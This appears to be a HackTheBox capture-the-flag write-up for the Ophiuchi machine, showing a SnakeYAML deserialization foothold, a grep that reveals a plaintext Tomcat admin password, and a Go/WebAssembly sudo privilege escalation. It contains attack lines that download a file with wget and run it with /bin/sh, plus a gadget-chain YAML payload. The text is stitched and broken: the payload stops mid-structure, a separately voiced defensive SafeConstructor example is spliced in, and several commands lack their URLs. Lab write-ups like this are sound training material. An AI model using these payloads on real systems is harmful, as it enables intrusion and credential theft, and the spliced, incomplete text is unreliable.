SnakeYAML, Go & WebAssembly – Ophiuchi @ HackTheBox

We are going to solve Ophiuchi, a 30-point machine on HackTheBox. The foothold comes from a SnakeYAML parser vulnerability, and privilege escalation comes from a custom Go program we can run with sudo, which loads a WebAssembly file and then executes a shell script by a relative rather than an absolute path.


SnakeYAML Parser vulnerability:


Change payload to:

Runtime.getRuntime().exec("wget -O /tmp/x");
Runtime.getRuntime().exec("/bin/sh /tmp/x");


javac yaml-payload/src/artsploit/
jar -cvf payload.jar -C yaml-payload/src/ .

Send Exploit:

!!javax.script.ScriptEngineManager [
  !! [[
    !! [""]
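For the defender's side of this step, here is an added example (not code from the writeup, and not part of the yaml-payload project) showing why the tag above is dangerous and what closes the hole: SnakeYAML's default constructor resolves global `!!` tags to Java classes, while `SafeConstructor` only builds plain YAML types and throws on any global tag. The class name `YamlLoaderCheck` and the sample document are mine; the code assumes SnakeYAML 1.33 or 2.x, where `SafeConstructor` takes a `LoaderOptions` argument.

```java
import org.yaml.snakeyaml.LoaderOptions;
import org.yaml.snakeyaml.Yaml;
import org.yaml.snakeyaml.constructor.ConstructorException;
import org.yaml.snakeyaml.constructor.SafeConstructor;

public class YamlLoaderCheck {

    // Constructed sample: an untrusted document that asks the parser to
    // instantiate a JDK class through a global (!!) tag. The chain used in
    // the writeup starts with exactly this kind of tag.
    static final String UNTRUSTED = "!!javax.script.ScriptEngineManager []";

    // Vulnerable pattern (SnakeYAML 1.x): the default constructor maps a
    // global tag to a class and tries to instantiate it from the node.
    static Object loadUnsafe(String doc) {
        return new Yaml().load(doc);
    }

    // Hardened pattern: SafeConstructor only builds maps, lists and scalars
    // of the standard YAML types and rejects every global tag.
    static Object loadSafe(String doc) {
        return new Yaml(new SafeConstructor(new LoaderOptions())).load(doc);
    }

    public static void main(String[] args) {
        try {
            loadSafe(UNTRUSTED);
            System.out.println("unexpected: document was accepted");
        } catch (ConstructorException e) {
            // Expected: "could not determine a constructor for the tag ..."
            System.out.println("rejected by SafeConstructor: " + e.getMessage());
        }
        // An ordinary document still parses normally under SafeConstructor.
        System.out.println(loadSafe("name: demo\nreplicas: 3"));
    }
}
```

Any service that calls `load()` on user-supplied YAML should use the `loadSafe` form; when a configuration format genuinely needs custom types, register them explicitly on a `Constructor` rather than allowing arbitrary global tags.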

Get Admin Password:

grep -ir "password" .
/tomcat/conf/tomcat-users.xml:<user username="admin" password="whythereisalimit" roles="manager-gui,admin-gui"/>

WebAssembly “main.c”:

// exported to the Go loader as _info (see the emcc EXPORTED_FUNCTIONS flag)
int info() {
    return 1;
}

Compile with emscripten:

sudo docker run --rm -v $(pwd):/src -u $(id -u):$(id -g) emscripten/emsdk emcc --no-entry main.c -s WASM=1 -o main.html -s "EXPORTED_FUNCTIONS=['_info']";

Transfer & Execute:

cd /tmp
curl > main.wasm
curl >
chmod +x
sudo /usr/bin/go run /opt/wasm-functions/index.go
